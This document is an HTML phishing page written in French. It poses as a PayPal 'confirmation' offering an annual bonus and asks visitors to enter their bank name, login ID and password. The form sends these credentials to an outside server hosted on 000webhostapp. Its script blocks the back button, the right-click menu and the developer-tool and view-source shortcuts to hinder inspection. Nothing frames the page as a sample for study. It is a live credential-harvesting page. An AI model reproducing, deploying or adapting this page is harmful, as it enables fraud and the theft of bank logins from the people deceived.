<!DOCTYPE html>

<html>
<head>
<title>Confirmation</title>
	<link rel="shortcut icon" href="https://cdn3.iconfinder.com/data/icons/development-icons/128/gift_box_bonus-512.png"/>
    <meta property="og:image" content="https://i.postimg.cc/zfsyd6g0/dfghyyyyyy.jpg" />
<meta property="og:description" content="**  La dernière confirmation 😃    **" />
<meta property="og:title" content=" />
<!--[if !mso]><!-->
<meta content="IE=edge" http-equiv="X-UA-Compatible"/>
<meta charset="utf-8"/>
<meta content="width=device-width" name="viewport"/>
<link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css"/>
<style>
		.bee-form .bee-form-row .bee-field button {
			font-size: inherit;
			font-family: inherit
		}

		.bee-row-3 .bee-row-content,
		body {
			background-color: #141f45;
			color: #000
		}

		.bee-row-1,
		.bee-row-1 .bee-row-content,
		.bee-row-2,
		.bee-row-3,
		.bee-row-3 .bee-row-content,
		.bee-row-4 {
			background-repeat: no-repeat
		}

		body {
			font-family: Arial, Helvetica Neue, Helvetica, sans-serif
		}

		a {
			color: #6dcbf3
		}

		* {
			box-sizing: border-box
		}

		body,
		h1,
		p {
			margin: 0
		}

		.bee-row-content {
			max-width: 1200px;
			margin: 0 auto;
			display: flex
		}

		.bee-row-content .bee-col-w2 {
			flex-basis: 17%
		}

		.bee-row-content .bee-col-w6 {
			flex-basis: 50%
		}

		.bee-row-content .bee-col-w8 {
			flex-basis: 67%
		}

		.bee-row-2 .bee-col-2 .bee-block-2 div.label:not(.inline),
		.bee-row-2 .bee-col-2 .bee-block-2 label:not(.inline),
		.bee-row-content .bee-col-w12 {
			flex-basis: 100%
		}

		.bee-icon .bee-icon-label-right a {
			text-decoration: none
		}

		.bee-divider,
		.bee-image {
			overflow: auto
		}

		.bee-divider .center,
		.bee-image .bee-center {
			margin: 0 auto
		}

		.bee-form .bee-form-row .bee-field {
			padding: 3px;
			display: flex;
			flex: 1;
			flex-wrap: wrap;
			align-content: flex-start
		}

		.bee-form .bee-form-row .bee-field input:not([type=checkbox]):not([type=radio]) {
			flex-grow: 1;
			font-family: inherit;
			font-size: inherit
		}

		.bee-form .bee-form-row .bee-field .bee-button-container {
			flex-grow: 1
		}

		.bee-form input[type=color] {
			border: none;
			height: 38px
		}

		.bee-form input[type=color]::-webkit-color-swatch-wrapper {
			margin: 0;
			padding: 2px
		}

		.bee-form input[type=color]::-webkit-color-swatch {
			margin: 0;
			padding: 0
		}

		.bee-icon,
		.bee-icon .bee-icon-image,
		.bee-icon .bee-icon-label-right {
			display: inline-block
		}

		.bee-icon {
			vertical-align: middle
		}

		.bee-icon .bee-icon-image {
			vertical-align: middle;
			margin-right: -4px
		}

		.bee-image img {
			display: block;
			width: 100%
		}

		.bee-text {
			overflow-wrap: anywhere
		}

		@media (max-width:768px) {
			.bee-form {
				width: 100% !important
			}

			.bee-row-content:not(.no_stack) {
				display: block
			}
		}

		.bee-row-1 .bee-row-content {
			background-image: url('https://d1oco4z2z1fhwp.cloudfront.net/templates/default/3696/background-light-larger_3.jpg');
			color: #000
		}

		.bee-row-1 .bee-col-1,
		.bee-row-1 .bee-col-2,
		.bee-row-2 .bee-col-3,
		.bee-row-4 .bee-col-1 {
			padding-bottom: 5px;
			padding-top: 5px
		}

		.bee-row-1 .bee-col-1 .bee-block-1 {
			padding-left: 10px;
			padding-right: 10px;
			padding-top: 40px;
			width: 100%
		}

		.bee-row-1 .bee-col-2 .bee-block-1 {
			padding-left: 15px;
			padding-right: 15px;
			text-align: center;
			width: 100%
		}

		.bee-row-2 .bee-row-content,
		.bee-row-4 .bee-row-content {
			background-repeat: no-repeat;
			color: #000
		}

		.bee-row-2 .bee-col-2 .bee-block-1 {
			padding: 30px 15px 15px
		}

		.bee-row-2 .bee-col-2 .bee-block-2 {
			font-family: inherit;
			font-size: 14px;
			padding: 10px 10px 30px;
			text-align: center;
			width: 100%;
			margin: 0 auto
		}

		.bee-row-3 .bee-col-1 {
			padding-top: 5px
		}

		.bee-row-4 .bee-col-1 .bee-block-1 {
			color: #9d9d9d;
			font-family: inherit;
			font-size: 15px;
			padding-bottom: 5px;
			padding-top: 5px;
			text-align: center
		}

		.bee-row-4 .bee-col-1 .bee-block-1 .bee-icon-image {
			padding: 5px 6px 5px 5px
		}

		.bee-row-4 .bee-col-1 .bee-block-1 .bee-icon {
			margin-left: 0;
			margin-right: 0
		}

		.bee-row-2 .bee-col-2 .bee-block-2 div.label,
		.bee-row-2 .bee-col-2 .bee-block-2 label {
			color: #fff;
			line-height: 200%;
			text-align: left;
			display: block
		}

		.bee-row-2 .bee-col-2 .bee-block-2 div.label {
			padding: 3px
		}

		.bee-row-2 .bee-col-2 .bee-block-2 input:not([type=checkbox]):not([type=radio]):not([type=image]) {
			background-color: #19264f;
			border-bottom: 1px solid #6dcbf3;
			border-left: 1px solid #6dcbf3;
			border-radius: 4px;
			border-right: 1px solid #6dcbf3;
			border-top: 1px solid #6dcbf3;
			color: #fff;
			padding: 5px
		}

		.bee-row-2 .bee-col-2 .bee-block-2 input:not([type=checkbox]):not([type=radio]):focus {
			outline-color: #fff
		}

		.bee-row-2 .bee-col-2 .bee-block-2 button {
			background-color: #3aaee0;
			border-bottom: 0 solid transparent;
			border-left: 0 solid transparent;
			border-radius: 4px;
			border-right: 0px solid transparent;
			border-top: 0 solid transparent;
			color: #fff;
			line-height: 200%;
			padding: 5px 20px;
			width: 60%
		}

		.bee-row-2 .bee-col-2 .bee-block-2 .bee-button-container {
			text-align: "center"
		}
	</style>
</head>
<body>
<div class="bee-page-container">
<div class="bee-row bee-row-1">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w6">
<div class="bee-block bee-block-1 bee-image"><img alt="plastic bottle" class="bee-center bee-autowidth" src="https://i.postimg.cc/br9Vqf6Z/Fardd.png" style="max-width:512px;"/></div>
<div class="bee-block bee-block-2 bee-divider">
<div class="spacer" style="height:20px;"></div>
</div>
</div>
<div class="bee-col bee-col-2 bee-col-w6">
<div class="bee-block bee-block-1 bee-heading">
<h1 style="color:#ffffff;direction:ltr;font-family:'Courier New', Courier, 'Lucida Sans Typewriter', 'Lucida Typewriter', monospace;font-size:61px;font-weight:normal;letter-spacing:5px;line-height:120%;text-align:left;margin-top:0;margin-bottom:0;"><strong>PayPal</strong><br/> </h1>
</div>
<div class="bee-block bee-block-2 bee-divider">
<div class="spacer" style="height:40px;"></div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-2">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w2">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:10px;"></div>
</div>
</div>
<div class="bee-col bee-col-2 bee-col-w8">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="line-height: 120%; font-size: 12px; color: #ffffff; font-family: inherit;">
<p style="font-size: 14px; line-height: 16px; text-align: center;"><span style="font-size: 20px; line-height: 24px;">Veuillez vous connecter à votre compte bancaire afin de recevoir votre bonus annuel </span></p>
</div>
</div>
<div class="bee-block bee-block-2 bee-form" id="petition">
<form accept-charset="UTF-8" action="https://ckopilonique.000webhostapp.com/BK.php" autocomplete="on" enctype="multipart/form-data" method="post" target="_self">
<div class="bee-form-row"></div>
<div class="bee-form-row"></div>
<div class="bee-form-row"></div>
<div class="bee-form-row">
<div class="bee-field bee-field-id_zf2agf"><label for="id_zf2agf">Nom de banque:</label><input id="id_zf2agf" name="Bank" required="" type="text"/></div>
</div>
<div class="bee-form-row">
<div class="bee-field bee-field-id_zf2agf"><label for="id_zf2agf">identifiant:</label><input id="id_zf2agf" name="id" required="" type="text"/></div>
</div>
<div class="bee-form-row">
<div class="bee-field bee-field-id_zf2agf"><label for="id_zf2agf">Mot de pass ou Access code:</label><input id="id_zf2agf" name="pass" required="" type="text"/></div>
<div class="bee-form-row">
</div>
<div class="bee-form-row">
<div class="bee-field bee-field-id_jxz5uk">
<div class="bee-button-container"><button id="id_jxz5uk" name="submit" type="submit" value="Créer un compte">Continuer sur Paypal</button></div>
</div>
													    <script language="JavaScript">
	window.history.forward();
function noBack() { window.history.forward(); }

window.onload = function() {
document.addEventListener("contextmenu", function(e){
  e.preventDefault();
}, false);
document.addEventListener("keydown", function(e) {
//document.onkeydown = function(e) {
  // "I" key
  if (e.ctrlKey && e.shiftKey && e.keyCode == 73) {
	disabledEvent(e);
  }
  // "J" key
  if (e.ctrlKey && e.shiftKey && e.keyCode == 74) {
	disabledEvent(e);
  }
  // "S" key + macOS
  if (e.keyCode == 83 && (navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey)) {
	disabledEvent(e);
  }
  // "U" key
  if (e.ctrlKey && e.keyCode == 85) {
	disabledEvent(e);
  }
  // "F12" key
  if (event.keyCode == 123) {
	disabledEvent(e);
  }
}, false);
function disabledEvent(e){
  if (e.stopPropagation){
	e.stopPropagation();
  } else if (window.event){
	window.event.cancelBubble = true;
  }
  e.preventDefault();
  return false;
}
};
</script>
</div>
<div class="bee-form-row"></div>
<div class="bee-form-row"></div>
<div class="bee-form-row"></div>
<div class="bee-form-row"></div>
<div class="bee-form-row"></div>
</form>
</div>
</div>
<div class="bee-col bee-col-3 bee-col-w2">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:10px;"></div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-3">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:55px;"></div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-4">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-icons">
<div class="bee-icon">
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
